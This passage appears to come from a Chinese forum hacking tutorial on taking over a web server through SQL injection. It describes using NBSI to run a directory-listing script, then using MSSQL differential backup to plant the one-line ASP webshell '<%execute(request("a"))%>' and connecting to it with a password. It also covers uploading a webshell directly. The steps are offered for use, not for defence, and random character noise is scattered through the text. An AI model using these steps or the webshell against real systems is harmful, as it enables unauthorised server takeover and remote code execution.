然后使用NBSI上传到服务器上,然后执行cscript X:\lookweb.vbs,在回显信息里我们就可以看见该服务器上相应网站与其对应的网站目录,很方便的。网站目录一目了然。 S# K3 |) S) n. F3 Y" B$ l/ l3 X 3 W0 G: k1 t" g* V" U, \8 f 找到了网站的目录 ,我们就可以使用差异备份来获取webshell3 L9 [( W! f& J+ a6 S
; C j0 f V' e7 c( n+ \1 y
我喜欢使用xiaolu写的Getwebshell,其中<%execute(request("a"))%>的a就是我们过会一句话木马要连接的密码,一定要注意MSSQL数据库是什么类型的,是字符型的还是数字型的。填写好相应的地方,路径一般都是网站的目录,如“D:\wwwroot\”在后面写上备份后的数据库名称,如ri.asp;点“BackupShell”系统就开始自动备份数据库了。备份成功后我们就访问我们备份的文件,当浏览器打开是乱码的时候就成功了。我们用lake2的一句话链接下就可以了,注意要填写密码哦。到这里基本上就可以拿到webshell了;4 G l% o) ^, b
' ?/ d+ O M5 u: ^ 不用差异备份,就直接找到网站的目录,直接上传webshell文件到网站的目录下看看,也是可以的。! j+ g+ ]$ z# p' `4 l3 K